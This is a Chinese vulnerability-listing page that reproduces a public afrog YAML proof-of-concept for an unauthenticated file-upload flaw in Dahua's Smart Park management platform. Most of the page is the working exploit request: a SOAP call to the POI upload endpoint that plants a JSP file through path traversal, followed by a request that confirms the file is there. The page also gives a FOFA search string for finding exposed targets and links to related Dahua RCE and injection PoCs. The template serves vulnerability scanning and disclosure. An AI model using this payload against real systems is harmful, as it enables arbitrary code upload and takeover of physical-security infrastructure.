dahua-zhyq-pio-fileupload: 大华智慧园区前台 poi 文件上传

日期: 2025-09-01 | 影响软件: 大华智慧园区 | POC: 已公开

漏洞描述

FOFA: app="dahua-智慧园区综合管理平台"

PoC代码[已公开]

id: dahua-zhyq-pio-fileupload

info:
  name: 大华智慧园区 前台 poi 文件上传
  author: 5ddddd
  severity: critical
  description: |
    FOFA: app="dahua-智慧园区综合管理平台"
  verified: true
  tags: dahua,fileupload
  created: 2023/08/22

set:
  randstr: randomLowercase(20)
  r2: randomLowercase(32)
  randbody: base64(r2)
rules:
  r0:
    request:
      method: POST
      path: /emap/webservice/gis/soap/poi
      headers:
        Content-Type: text/xml;charset=UTF-8
      body: "\
        <soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:res=\"http://response.webservice.poi.mapbiz.emap.dahuatech.com/\">\r\n\
        <soapenv:Header/>\r\n\
        <soapenv:Body>\r\n\
        <res:uploadPicFile>\r\n\
        <!--type: string-->\r\n\
        <arg0>/../../{{randstr}}.jsp</arg0>\r\n\
        <!--type: base64Binary-->\r\n\
        <arg1>{{randbody}}</arg1>\r\n\
        </res:uploadPicFile>\r\n\
        </soapenv:Body>\r\n\
        </soapenv:Envelope>\r\n\
          "
    expression: response.status == 200  && response.body.bcontains(b'xmlns:')
  r1:
    request:
      method: GET
      path: /upload/{{randstr}}.jsp
      follow_redirects: true
    expression: response.status == 200 && response.body.bcontains(bytes(r2))
expression: r0() && r1()

来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/vulnerability/dahua-zhyq-pio-fileupload.yaml

漏洞描述

PoC代码[已公开]

相关漏洞推荐

dahua-smart-park-deleteftp-rce: 大华智慧园区综合管理平台 deleteFtp 远程命令执行 POC

dahua-smartpark-sql-inject: 大华智慧园区综合管理平台SQL注入 POC

dahua-zhyq-password-disclosure: 大华智慧园区任意密码读取攻击 POC

dahua-ipms-rce: 大华智慧园区综合管理平台 ipms 远程代码执行漏洞 POC

dahua-smart-downloadbyurlatt-fileread: 大华智慧园区管理平台任意文件读取 POC